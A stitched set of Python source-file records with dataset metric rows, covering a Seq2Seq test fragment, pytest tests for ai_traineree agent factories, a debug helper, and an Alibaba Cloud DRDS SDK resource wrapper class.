0.9,0.1,0.2,0.4,0.5,0.5,0.1,0.7,0.0,0.1,1.0,0.6,0.1,0.5,0.7,0.2,0.7,0.1,0.1,0.5,0.5,0.2,0.7,0.0,0.9,0.3,0.2,0.9,0.2,0.2,0.5,0.5,0.6,0.3,0.4,0.9,0.4,0.5,0.8,0.1,0.4,0.5,0.9,0.5,0.4,0.3,1.0,0.7,0.5,0.1,0.0,0.3,0.0,0.5,0.5,0.9,0.6,0.3,0.7,0.1,0.9,0.1,0.9,0.1,0.8,0.0,0.9,0.0,0.0,0.7,0.6,1.0,0.5,0.9,0.7,0.4,0.5,0.6,0.3,0.6,0.9,0.4,0.3,0.3,1.0,0.2,1.0,0.3,0.7,0.9,0.8,0.8,0.7,0.6,0.6,0.8,0.5,0.3,0.4,0.5,0.1,0.3,0.4,0.0,0.2,0.8,0.3,1.0,0.5,0.0,0.7,0.9,0.3,0.3,0.9,0.9,0.5,0.0,0.0,0.6,0.7,0.6,0.5,0.1,0.8,0.3,0.3,0.1,0.7,0.0,0.6,0.0,0.1,0.9,0.1,0.4,0.1,0.5,1.0,0.3,0.2,0.8,0.6,0.3,0.5,0.3,0.1,0.9,0.1,0.9,0.9,0.1,0.8,0.7,0.8,0.3,0.5,1.0,0.1,0.7,0.4,0.7,0.7,0.9,0.9,1.0,0.3,0.8,0.3,0.3,0.5,0.2,0.6,0.4,0.5,0.7,0.8,0.9,0.8,0.9,0.2,0.0,0.5,0.2,1.0,0.7,0.4,0.1,0.6,0.6,0.0,0.4,0.6,0.6,0.4,0.1,0.7,1.0,0.1,0.4,0.3,0.9,0.1,0.0,0.1,0.6,0.1,1.0,0.1,0.3,0.3,0.4,0.3,0.8,0.2,0.5,0.1,0.3,0.8,0.7,0.0,0.4,0.5,0.2,0.0,0.5,0.8,0.2,0.6,0.9,0.8,0.9,0.5,0.7,0.5,0.9,0.9,0.3,0.5,0.3,1.0,0.8,0.7,0.9,0.6,0.6,0.5,0.8,0.2,0.7,0.6,0.3,0.1,0.9,0.2,0.4,0.9,0.3,0.2,0.5,0.5,0.9,0.2,1.0,0.9,0.8,0.2,0.2,1.0,0.4,0.4,0.6,0.8,0.3,0.2,0.6,0.0,0.5,0.9,0.6,0.3,0.4,0.8,0.5,0.6,0.7,0.6,0.0,0.1,0.3,0.7,0.4,0.1,0.2,0.7,0.2,0.3,0.8,0.2,0.4,0.2,1.0,1.0,0.7,0.8,0.2,0.5,0.3,0.5,0.4,0.6,0.5,0.3,0.6,0.5,1.0,0.7,0.8,0.9,0.0,0.6,0.3,0.9,0.3,0.9,0.5,0.7,0.5,0.1,0.1,0.3,0.7,0.8,0.1,0.0,0.7,0.5,1.0,0.3,0.8,0.7,0.7,0.2,0.9,0.5,0.6,0.1,0.5,0.5,0.0,0.2,0.7,0.9,0.1,0.9,0.3,0.2]]).to(device, dtype=torch.int64)
model = Seq2Seq(enc, dec, SRC_PAD_IDX, TRG_PAD_IDX, device).to(
device
)
out, attention = model(x, trg[:, :])
print(out.shape)
print(attention.shape)
''' | 64.793939 | 4,134 | 0.500795 | 10,075 | 32,073 | 1.55464 | 0.01737 | 0.083381 | 0.080444 | 0.0166 | 0.843197 | 0.806167 | 0.770925 | 0.688629 | 0.644257 | 0.576326 | 0 | 0.321475 | 0.184049 | 32,073 | 495 | 4,135 | 64.793939 | 0.277035 | 0.110467 | 0 | 0.434343 | 0 | 0 | 0.023805 | 0.013054 | 0 | 0 | 0 | 0 | 0.005051 | 1 | 0.080808 | false | 0 | 0.075758 | 0 | 0.237374 | 0.040404 | 0 | 0 | 1 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e88c0f3cb9094d56c0f6355b87011cc2bc7bd60c | 46 | py | Python | tests/test_import.py | eager-dev/eagerx_template | caefcb2c9118897f983edc597d76f7c51a4ecafe | [
"Apache-2.0"
] | 1 | 2022-03-07T14:11:05.000Z | 2022-03-07T14:11:05.000Z | tests/test_import.py | eager-dev/eagerx_template | caefcb2c9118897f983edc597d76f7c51a4ecafe | [
"Apache-2.0"
] | null | null | null | tests/test_import.py | eager-dev/eagerx_template | caefcb2c9118897f983edc597d76f7c51a4ecafe | [
"Apache-2.0"
] | null | null | null | def test_import():
import eagerx_template
| 15.333333 | 26 | 0.76087 | 6 | 46 | 5.5 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 46 | 2 | 27 | 23 | 0.868421 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 1 | 0 | 1.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2ce4de455f5a5946b662262cbe4582c5de33de8e | 4,986 | py | Python | tests/agents/test_agent_factory.py | LuisFMCuriel/ai-traineree | 121da3ea48992d9db3ede3634e4e5f48f50f4cc3 | [
"Apache-2.0"
] | null | null | null | tests/agents/test_agent_factory.py | LuisFMCuriel/ai-traineree | 121da3ea48992d9db3ede3634e4e5f48f50f4cc3 | [
"Apache-2.0"
] | null | null | null | tests/agents/test_agent_factory.py | LuisFMCuriel/ai-traineree | 121da3ea48992d9db3ede3634e4e5f48f50f4cc3 | [
"Apache-2.0"
] | null | null | null | import pytest
from ai_traineree.agents.agent_factory import AgentFactory
from ai_traineree.agents.ddpg import DDPGAgent
from ai_traineree.agents.dqn import DQNAgent
from ai_traineree.agents.ppo import PPOAgent
from ai_traineree.agents.sac import SACAgent
from ai_traineree.types.dataspace import DataSpace
from ai_traineree.types.state import AgentState
def test_agent_factory_agent_from_state_wrong_state():
# Assign
state = AgentState(
model="WrongModel",
obs_space=4,
action_space=4,
config={},
network=None,
buffer=None,
)
with pytest.raises(ValueError):
AgentFactory.from_state(state)
def test_agent_factory_dqn_agent_from_state_network_buffer_none():
# Assign
obs_space = DataSpace(shape=(5,), dtype="float", low=0, high=2)
action_space = DataSpace(shape=(1,), dtype="int", low=0, high=5)
agent = DQNAgent(obs_space, action_space, device="cpu")
state = agent.get_state()
state.network = None
state.buffer = None
# Act
new_agent = AgentFactory.from_state(state)
# Assert
assert id(new_agent) != id(agent)
assert new_agent.model == DQNAgent.model
assert new_agent.hparams == agent.hparams
def test_agent_factory_dqn_agent_from_state():
# Assign
obs_space = DataSpace(shape=(10,), dtype="float")
action_space = DataSpace(shape=(1,), dtype="int", low=1, high=5)
agent = DQNAgent(obs_space, action_space, device="cpu")
state = agent.get_state()
# Act
new_agent = AgentFactory.from_state(state)
# Assert
assert id(new_agent) != id(agent)
assert new_agent == agent
assert new_agent.model == DQNAgent.model
assert new_agent.hparams == agent.hparams
assert new_agent.buffer == agent.buffer
def test_agent_factory_ppo_agent_from_state():
# Assign
obs_space = DataSpace(dtype="float", shape=(10,))
action_space = DataSpace(dtype="float", shape=(5,))
agent = PPOAgent(obs_space, action_space, device="cpu")
state = agent.get_state()
# Act
new_agent = AgentFactory.from_state(state)
# Assert
assert id(new_agent) != id(agent)
assert new_agent == agent
assert new_agent.model == PPOAgent.model
assert new_agent.hparams == agent.hparams
assert new_agent.buffer == agent.buffer
def test_agent_factory_ppo_agent_from_state_network_buffer_none():
# Assign
obs_space = DataSpace(dtype="float", shape=(10,))
action_space = DataSpace(dtype="float", shape=(5,))
agent = PPOAgent(obs_space, action_space, device="cpu")
state = agent.get_state()
state.network = None
state.buffer = None
# Act
new_agent = AgentFactory.from_state(state)
# Assert
assert id(new_agent) != id(agent)
assert new_agent.model == PPOAgent.model
assert new_agent.hparams == agent.hparams
def test_agent_factory_ddpg_agent_from_state():
# Assign
obs_space = DataSpace(dtype="float", shape=(4,))
action_space = DataSpace(dtype="float", shape=(4,))
agent = DDPGAgent(obs_space, action_space, device="cpu")
state = agent.get_state()
# Act
new_agent = AgentFactory.from_state(state)
# Assert
assert id(new_agent) != id(agent)
assert new_agent.model == DDPGAgent.model
assert new_agent == agent
assert new_agent.hparams == agent.hparams
assert new_agent.buffer == agent.buffer
def test_agent_factory_ddpg_agent_from_state_network_buffer_none():
# Assign
obs_space = DataSpace(dtype="float", shape=(4,))
action_space = DataSpace(dtype="float", shape=(4,))
agent = DDPGAgent(obs_space, action_space, device="cpu")
state = agent.get_state()
state.network = None
state.buffer = None
# Act
new_agent = AgentFactory.from_state(state)
# Assert
assert id(new_agent) != id(agent)
assert new_agent.model == DDPGAgent.model
assert new_agent.hparams == agent.hparams
def test_agent_factory_sac_agent_from_state():
# Assign
obs_space = DataSpace(dtype="float", shape=(10,))
action_space = DataSpace(dtype="float", shape=(5,))
agent = SACAgent(obs_space, action_space, device="cpu")
state = agent.get_state()
# Act
new_agent = AgentFactory.from_state(state)
# Assert
assert id(new_agent) != id(agent)
assert new_agent == agent
assert new_agent.model == SACAgent.model
assert new_agent.hparams == agent.hparams
assert new_agent.buffer == agent.buffer
def test_agent_factory_ppo_agent_from_state_network_buffer_none():
# Assign
obs_space = DataSpace(dtype="float", shape=(10,))
action_space = DataSpace(dtype="float", shape=(5,))
agent = SACAgent(obs_space, action_space, device="cpu")
state = agent.get_state()
state.network = None
state.buffer = None
# Act
new_agent = AgentFactory.from_state(state)
# Assert
assert id(new_agent) != id(agent)
assert new_agent.model == SACAgent.model
assert new_agent.hparams == agent.hparams
| 29.502959 | 68 | 0.698155 | 661 | 4,986 | 5.015129 | 0.086233 | 0.096531 | 0.101357 | 0.068778 | 0.843741 | 0.840724 | 0.840724 | 0.832278 | 0.795777 | 0.795777 | 0 | 0.007176 | 0.189531 | 4,986 | 168 | 69 | 29.678571 | 0.813165 | 0.030084 | 0 | 0.728972 | 0 | 0 | 0.022869 | 0 | 0 | 0 | 0 | 0 | 0.299065 | 1 | 0.084112 | false | 0 | 0.074766 | 0 | 0.158879 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2cf3102a3dacd83b214d10d3e9a6fbe236ac5887 | 97 | py | Python | debug.py | fiorin7/xml-to-teilex | 3bcee38dbee287998dda3de5b2a019b75d58beb6 | [
"MIT"
] | null | null | null | debug.py | fiorin7/xml-to-teilex | 3bcee38dbee287998dda3de5b2a019b75d58beb6 | [
"MIT"
] | 1 | 2021-12-13T20:45:31.000Z | 2021-12-13T20:45:31.000Z | debug.py | fiorin7/xml-to-teilex | 3bcee38dbee287998dda3de5b2a019b75d58beb6 | [
"MIT"
] | null | null | null | from os import environ
def debug():
return True if environ.get('TRANSFORM_DEBUG') else False | 24.25 | 60 | 0.752577 | 15 | 97 | 4.8 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164948 | 97 | 4 | 60 | 24.25 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0.153061 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
fa12b88a048f47e8584af66453e0f7033b0cc294 | 33,278 | py | Python | alibabacloud/services/_drds.py | wallisyan/alibabacloud-python-sdk-v2 | 6e024c97cded2403025a7dd8fea8261e41872156 | [
"Apache-2.0"
] | null | null | null | alibabacloud/services/_drds.py | wallisyan/alibabacloud-python-sdk-v2 | 6e024c97cded2403025a7dd8fea8261e41872156 | [
"Apache-2.0"
] | null | null | null | alibabacloud/services/_drds.py | wallisyan/alibabacloud-python-sdk-v2 | 6e024c97cded2403025a7dd8fea8261e41872156 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Alibaba Cloud Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from alibabacloud.resources.base import ServiceResource
from alibabacloud.resources.collection import _create_special_resource_collection
from alibabacloud.utils.utils import _new_get_key_in_response, _transfer_params
class _DRDSResource(ServiceResource):
def __init__(self, _client=None):
ServiceResource.__init__(self, 'drds', _client=_client)
self.regions = _create_special_resource_collection(
_DRDSRegionResource, _client, _client.describe_drds_regions,
'Regions.Region', 'RegionId',
)
def create_drds_db_pre_check(self, **params):
_params = _transfer_params(params)
response = self._client.create_drds_db_pre_check(**_params)
task_id = _new_get_key_in_response(response, 'TaskId')
return _DRDSDBPreCheckResource(task_id, _client=self._client)
def create_instance_internet_address(self, **params):
_params = _transfer_params(params)
self._client.create_instance_internet_address(**_params)
instance_internet_address_name = _params.get("instance_internet_address_name")
return _DRDSInstanceInternetAddressResource(instance_internet_address_name,
_client=self._client)
class _DRDSDBPreCheckResource(ServiceResource):
def __init__(self, task_id, _client=None):
ServiceResource.__init__(self, "drds.db_pre_check", _client=_client)
self.task_id = task_id
class _DRDSInstanceInternetAddressResource(ServiceResource):
def __init__(self, instance_internet_address_name, _client=None):
ServiceResource.__init__(self, "drds.instance_internet_address", _client=_client)
self.instance_internet_address_name = instance_internet_address_name
def change_account_password(self, **params):
_params = _transfer_params(params)
return self._client.change_account_password(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def change_instance_azone(self, **params):
_params = _transfer_params(params)
return self._client.change_instance_azone(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def change_instance_network(self, **params):
_params = _transfer_params(params)
return self._client.change_instance_network(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def check_capacity_data_ready(self, **params):
_params = _transfer_params(params)
return self._client.check_capacity_data_ready(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def check_db_name(self, **params):
_params = _transfer_params(params)
return self._client.check_drds_db_name(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def check_expand_status(self, **params):
_params = _transfer_params(params)
return self._client.check_expand_status(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def check_rds_expand_status(self, **params):
_params = _transfer_params(params)
return self._client.check_rds_expand_status(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def check_rds_super_account(self, **params):
_params = _transfer_params(params)
return self._client.check_rds_super_account(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def check_sql_audit_enable_status(self, **params):
_params = _transfer_params(params)
return self._client.check_sql_audit_enable_status(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def configure_db_instances(self, **params):
_params = _transfer_params(params)
return self._client.configure_drds_db_instances(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def create_db(self, **params):
_params = _transfer_params(params)
return self._client.create_drds_db(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def create_db_preview(self, **params):
_params = _transfer_params(params)
return self._client.create_drds_db_preview(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def create_instance_account(self, **params):
_params = _transfer_params(params)
return self._client.create_instance_account(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def create_shard_task(self, **params):
_params = _transfer_params(params)
return self._client.create_shard_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def datalink_replication_precheck(self, **params):
_params = _transfer_params(params)
return self._client.datalink_replication_precheck(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def delete_shard_tasks(self, **params):
_params = _transfer_params(params)
return self._client.delete_shard_tasks(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_back_menu(self, **params):
_params = _transfer_params(params)
return self._client.describe_back_menu(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_backup_dbs(self, **params):
_params = _transfer_params(params)
return self._client.describe_backup_dbs(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_backup_local(self, **params):
_params = _transfer_params(params)
return self._client.describe_backup_local(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_backup_policy(self, **params):
_params = _transfer_params(params)
return self._client.describe_backup_policy(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_backup_sets(self, **params):
_params = _transfer_params(params)
return self._client.describe_backup_sets(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_backup_times(self, **params):
_params = _transfer_params(params)
return self._client.describe_backup_times(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_broadcast_tables(self, **params):
_params = _transfer_params(params)
return self._client.describe_broadcast_tables(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_can_expand_instance_detail_list(self, **params):
_params = _transfer_params(params)
return self._client.describe_can_expand_instance_detail_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_candidate_instance_list(self, **params):
_params = _transfer_params(params)
return self._client.describe_candidate_instance_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_cluster(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db_cluster(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_ip_white_list(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db_ip_white_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_dbs(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_dbs(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_instance(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_instance_dbs(self, **params):
_params = _transfer_params(params)
return self._client.describe_db_instance_dbs(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_instances(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db_instances(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_rds_name_list(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db_rds_name_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_rds_relation_info(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db_rds_relation_info(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_relation_info(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db_relation_info(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_tasks(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db_tasks(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_expand_logic_table_info_list(self, **params):
_params = _transfer_params(params)
return self._client.describe_expand_logic_table_info_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_global_broadcast_type(self, **params):
_params = _transfer_params(params)
return self._client.describe_global_broadcast_type(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_hi_store_instance_info(self, **params):
_params = _transfer_params(params)
return self._client.describe_hi_store_instance_info(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_hot_db_list(self, **params):
_params = _transfer_params(params)
return self._client.describe_hot_db_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_inst_db_log_info(self, **params):
_params = _transfer_params(params)
return self._client.describe_inst_db_log_info(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_inst_db_sls_info(self, **params):
_params = _transfer_params(params)
return self._client.describe_inst_db_sls_info(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance_accounts(self, **params):
_params = _transfer_params(params)
return self._client.describe_instance_accounts(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance_db_monitor(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_instance_db_monitor(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance_level_tasks(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_instance_level_tasks(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance_menu_switch(self, **params):
_params = _transfer_params(params)
return self._client.describe_instance_menu_switch(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance_monitor(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_instance_monitor(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance_switch_azone(self, **params):
_params = _transfer_params(params)
return self._client.describe_instance_switch_azone(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance_switch_network(self, **params):
_params = _transfer_params(params)
return self._client.describe_instance_switch_network(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance_version(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_instance_version(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_params(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_params(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_pre_check_result(self, **params):
_params = _transfer_params(params)
return self._client.describe_pre_check_result(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_rds_performance(self, **params):
_params = _transfer_params(params)
return self._client.describe_rds_performance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_rds_commodity(self, **params):
_params = _transfer_params(params)
return self._client.describe_rds_commodity(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_rds_performance_summary(self, **params):
_params = _transfer_params(params)
return self._client.describe_rds_performance_summary(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_rds_super_account_instances(self, **params):
_params = _transfer_params(params)
return self._client.describe_rds_super_account_instances(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_recycle_bin_status(self, **params):
_params = _transfer_params(params)
return self._client.describe_recycle_bin_status(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_recycle_bin_tables(self, **params):
_params = _transfer_params(params)
return self._client.describe_recycle_bin_tables(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_restore_order(self, **params):
_params = _transfer_params(params)
return self._client.describe_restore_order(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_shard_task_info(self, **params):
_params = _transfer_params(params)
return self._client.describe_shard_task_info(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_shard_task_list(self, **params):
_params = _transfer_params(params)
return self._client.describe_shard_task_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_sharding_dbs(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_sharding_dbs(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_slow_sqls(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_slow_sqls(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_sql_audit_status(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_sql_audit_status(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_sql_flashbak_task(self, **params):
_params = _transfer_params(params)
return self._client.describe_sql_flashbak_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_src_rds_list(self, **params):
_params = _transfer_params(params)
return self._client.describe_src_rds_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_storage_instance_sub_db_info(self, **params):
_params = _transfer_params(params)
return self._client.describe_storage_instance_sub_db_info(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_table(self, **params):
_params = _transfer_params(params)
return self._client.describe_table(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_table_list_by_type(self, **params):
_params = _transfer_params(params)
return self._client.describe_table_list_by_type(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_tables(self, **params):
_params = _transfer_params(params)
return self._client.describe_tables(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_tasks(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_tasks(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def disable_sql_audit(self, **params):
_params = _transfer_params(params)
return self._client.disable_sql_audit(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def enable_instance_ipv6_address(self, **params):
_params = _transfer_params(params)
return self._client.enable_instance_ipv6_address(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def enable_sql_audit(self, **params):
_params = _transfer_params(params)
return self._client.enable_sql_audit(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def enable_sql_flashback_match_switch(self, **params):
_params = _transfer_params(params)
return self._client.enable_sql_flashback_match_switch(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def flashback_recycle_bin_table(self, **params):
_params = _transfer_params(params)
return self._client.flashback_recycle_bin_table(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def get_candidate_instance_list(self, **params):
_params = _transfer_params(params)
response = self._client.get_candidate_instance_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
return response
def get_expand_logic_table_info_list(self, **params):
_params = _transfer_params(params)
response = self._client.get_expand_logic_table_info_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
return response
def get_hot_db_list(self, **params):
_params = _transfer_params(params)
response = self._client.get_hot_db_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
return response
def get_logic_table_info_list(self, **params):
_params = _transfer_params(params)
response = self._client.get_logic_table_info_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
return response
def get_src_rds_list(self, **params):
_params = _transfer_params(params)
response = self._client.get_src_rds_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
return response
def modify_account_description(self, **params):
_params = _transfer_params(params)
return self._client.modify_account_description(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def modify_account_privilege(self, **params):
_params = _transfer_params(params)
return self._client.modify_account_privilege(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def modify_instance_description(self, **params):
_params = _transfer_params(params)
return self._client.modify_drds_instance_description(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def modify_ip_white_list(self, **params):
_params = _transfer_params(params)
return self._client.modify_drds_ip_white_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def modify_polar_db_read_weight(self, **params):
_params = _transfer_params(params)
return self._client.modify_polar_db_read_weight(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def modify_rds_read_weight(self, **params):
_params = _transfer_params(params)
return self._client.modify_rds_read_weight(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def pre_check_create_hi_store_instance(self, **params):
_params = _transfer_params(params)
return self._client.pre_check_create_hi_store_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def pre_check_sql_flashback_task(self, **params):
_params = _transfer_params(params)
return self._client.pre_check_sql_flashback_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def put_restore_pre_check(self, **params):
_params = _transfer_params(params)
return self._client.put_restore_pre_check(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def put_start_backup(self, **params):
_params = _transfer_params(params)
return self._client.put_start_backup(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def rearrange_db_to_instance(self, **params):
_params = _transfer_params(params)
return self._client.rearrange_db_to_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def refresh_atom_url(self, **params):
_params = _transfer_params(params)
return self._client.refresh_drds_atom_url(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def refresh_jst_migrate_db_atom_url(self, **params):
_params = _transfer_params(params)
return self._client.refresh_jst_migrate_drds_db_atom_url(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def release(self, **params):
_params = _transfer_params(params)
return self._client.release_instance_internet_address(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def release_hi_store_instance(self, **params):
_params = _transfer_params(params)
return self._client.release_hi_store_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def remove_backups_set(self, **params):
_params = _transfer_params(params)
return self._client.remove_backups_set(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def remove_db(self, **params):
_params = _transfer_params(params)
return self._client.remove_drds_db(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def remove_db_failed_record(self, **params):
_params = _transfer_params(params)
return self._client.remove_drds_db_failed_record(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def remove_instance(self, **params):
_params = _transfer_params(params)
return self._client.remove_drds_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def remove_instance_account(self, **params):
_params = _transfer_params(params)
return self._client.remove_instance_account(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def remove_recycle_bin_table(self, **params):
_params = _transfer_params(params)
return self._client.remove_recycle_bin_table(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def reset_to_rds_connections(self, **params):
_params = _transfer_params(params)
return self._client.reset_drds_to_rds_connections(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def restart_instance(self, **params):
_params = _transfer_params(params)
return self._client.restart_drds_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def rollback_hi_store_instance(self, **params):
_params = _transfer_params(params)
return self._client.rollback_hi_store_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
